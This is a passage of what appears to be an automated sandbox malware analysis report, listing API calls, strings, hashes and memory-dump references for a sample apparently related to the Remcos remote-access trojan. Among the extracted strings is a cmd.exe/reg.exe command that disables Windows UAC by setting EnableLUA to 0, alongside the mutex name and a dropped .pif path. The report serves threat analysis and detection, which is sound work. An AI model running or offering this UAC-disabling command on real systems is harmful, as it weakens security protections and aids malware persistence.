                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                        • API String ID: 2922976086-4183131282
                                                                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • Rmc-L24XL1, xrefs: 004076DA
                                                                                        • C:\Users\Public\Libraries\nmfsxfjX.pif, xrefs: 004076C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$Rmc-L24XL1
                                                                                        • API String ID: 0-614935070
                                                                                        • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                                                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                                        • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                                                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                                                        • SetEvent.KERNEL32(?), ref: 0040512C
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                        • String ID: KeepAlive | Disabled
                                                                                        • API String ID: 2993684571-305739064
                                                                                        • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                                                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                        • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                                                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                                                        Strings
                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                        • API String ID: 3024135584-2418719853
                                                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                         • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • _free.LIBCMT ref: 00444E06
                                                                                        • _free.LIBCMT ref: 00444E1D
                                                                                        • _free.LIBCMT ref: 00444E3C
                                                                                        • _free.LIBCMT ref: 00444E57
                                                                                        • _free.LIBCMT ref: 00444E6E
                                                                                        Similarity
                                                                                        • API ID: _free$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3033488037-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                        • _free.LIBCMT ref: 004493BD
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00449589
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 1286116820-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                                          • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                                        Similarity
                                                                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 2180151492-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                                        • _free.LIBCMT ref: 0044F3BF
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1852769593-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                                                                        • _free.LIBCMT ref: 004482D3
                                                                                        • _free.LIBCMT ref: 004482FA
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00448307
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00448310
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                                        Similarity
                                                                                        • API ID: Process$CloseHandleOpen$FileImageName
                                                                                        • String ID:
                                                                                        • API String ID: 2951400881-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 004509D4
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 004509E6
                                                                                        • _free.LIBCMT ref: 004509F8
                                                                                        • _free.LIBCMT ref: 00450A0A
                                                                                        • _free.LIBCMT ref: 00450A1C
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00444066
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00444078
                                                                                        • _free.LIBCMT ref: 0044408B
                                                                                        • _free.LIBCMT ref: 0044409C
                                                                                        • _free.LIBCMT ref: 004440AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                                                                        • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                                                                        • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                                                                        • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                                                        • _free.LIBCMT ref: 0044E855
                                                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2812119850-3972193922
                                                                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountEventTick
                                                                                        • String ID: !D@$NG
                                                                                        • API String ID: 180926312-2721294649
                                                                                        • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                                        • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                        • String ID: XQG$NG$PG
                                                                                        • API String ID: 1634807452-3565412412
                                                                                        • Opcode ID: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                                                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                                        • Opcode Fuzzy Hash: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                                                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: `#D$`#D
                                                                                        • API String ID: 885266447-2450397995
                                                                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000104), ref: 00443475
                                                                                        • _free.LIBCMT ref: 00443540
                                                                                        • _free.LIBCMT ref: 0044354A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                        • API String ID: 2506810119-1258859749
                                                                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                                                                        • GetLastError.KERNEL32 ref: 0044B931
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 2456169464-263838557
                                                                                        • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                        • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                                                                        • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                        • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
